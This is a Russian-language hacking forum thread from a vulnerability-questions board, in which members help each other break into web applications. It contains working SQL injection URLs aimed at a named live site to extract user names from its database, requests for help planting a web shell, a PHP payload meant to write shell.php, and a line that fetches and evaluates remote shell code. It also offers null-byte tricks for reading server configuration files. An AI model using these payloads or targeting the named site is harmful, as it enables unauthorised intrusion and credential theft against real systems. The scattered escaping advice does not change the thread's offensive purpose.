Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    diznt, советую почитать http://forum.antichat.ru/thread43966.html
     
  2. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    581
    Reputations:
    256
    1. Открывать коммент там и не надо, тк запрос тупо SELECT * FROM news_posts WHERE news_id =$id

    2. ElteRUS, доступ к cpg_users есть, просто бд надо писать имя бд прописью, а не капсом
    http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+koleshev_1.cpg_users

    Для подтверждения:
    http://teambuilding-extreme.com/news/login.php?id=1+union+select+1,2,3,concat_ws(0x2F,TABLE_NAME,TABLE_SCHEMA,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.TABLES+where+TABLE_SCHEMA=database()+AND+TABLE_NAME+like+0x257573657225+limit+3,1

    А не выдает ничего, потому что таблица пустая.

    Попробуйте у себя на локалхосте выполнить
    SELECT 1,2,3 FROM information_schema.VIEWS
    все сразу вам понятно станет.
     
    1 person likes this.
  3. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    как я понял почитав кусочек статьи "--" это типа обозначение комента (то есть отбрасывает все что после него)

    Но зачем он нужен все таки не понятно!
     
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Смотри, может быть запрос вида
    Если будет такой запрос - мускуль выдаст ошибку, потому что посчитает news_name лишним, а если поставить запрос так
    то news_name = $name считатся не будет.

    Это пример =)
     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    если имеется в виду XSS, то нет. Но если $style_text впоследствии попадает в SQL-запрос, то фильтрация с помощью htmlspecialchars() не спасет от SQL-инъекций. Используй mysql_(real_)*escape_string()
     
  6. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    256
    Reputations:
    46
    На сервере есть функция:
    Можно ли как нибудь залить шелл? Имея доступ к $str?
     
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    file_get_contents() читает файлы, но не записывает
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    procedure, попробуй так (не уверен).
    PHP:
    $str=");$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')//";
    file_get_contents(./docs/danger $str /body.html);
    Если не стоит htmlspecialchars, получится вида
    PHP:
    file_get_contents(./docs/danger );$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')// /body.html);
     
    2 people like this.
  9. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    591
    Likes Received:
    465
    Reputations:
    5
    чо, с ума сошёл? :D
    оч смешно .. за шутку +5 :D

    ----

    2 procedure
    если можно юзать нулевой байт, можно прочитать интересные файлы, в том числе возможно и конф итд .. а там и до шелла недалеко..

    конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..
     
    #5189 159932, 1 Feb 2009
    Last edited: 1 Feb 2009
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    procedure
    PHP:
    <?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?>
    ?
     
  11. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    256
    Reputations:
    46
    mailbrush
    )))
    Все на страницу выводится, параметр get. А где можно прочитать про null байт?

    sabe бля сегодня день рождения у webkillá что все ведут себя так? )
     
    1 person likes this.
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    %00

    просто отрезает то, что после него идет
     
    2 people like this.
  13. procedure

    procedure Elder - Старейшина

    Joined:
    22 Dec 2007
    Messages:
    527
    Likes Received:
    256
    Reputations:
    46
    ./docs/danger\0/body.html
    - от такая хня получается(
     
  14. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    591
    Likes Received:
    465
    Reputations:
    5
    а это что ещё???
    там что, сказано что этот file_get_contents исполняется? там макс что можно, это прочитать файлы.. если хватит конфигов, да и если вывод есть..
     
  15. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    я откуда знаю что там вобще) я думал есть возможность заливать ) увЫ
     
  16. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без кавычек то
    то есть например

    $sql="SELECT `password` FROM user where id =".mysql_real_escape_string($_GET['user'])."LIMIT 1";
    все равно уязвим.
     
    #5196 AkyHa_MaTaTa, 1 Feb 2009
    Last edited: 1 Feb 2009
    2 people like this.
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\
     
  18. AHMED HASSAN

    AHMED HASSAN New Member

    Joined:
    25 Apr 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    hi

    sorry for my language

    what to do with this

    Microsoft JET Database Engine error '80040e10'

    No value given for one or more required parameters.

    /store/ancillary.asp, line 17

    thanx
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Нулл байт экранируется, включена маджик квот.

    AHMED HASSAN Официальный язык форума Русский, будь добр, пользуйся онлайн переводчиками (хотя-бы), или задавай вопросы в английском разделе.

    Official language a forum Russian, if you please, use online translators , or ask questions in English section.

    По поводу вопроса: это Access
    http://forum.antichat.ru/thread50550.html
     
    1 person likes this.
  20. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    даже если имеется возможность назначить собственное значение для $str, это никак не позволит выполнить код в file_get_contents(), как было предложено тобой.
    @AkyHa_MaTaTa
    без кавычек ;)
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.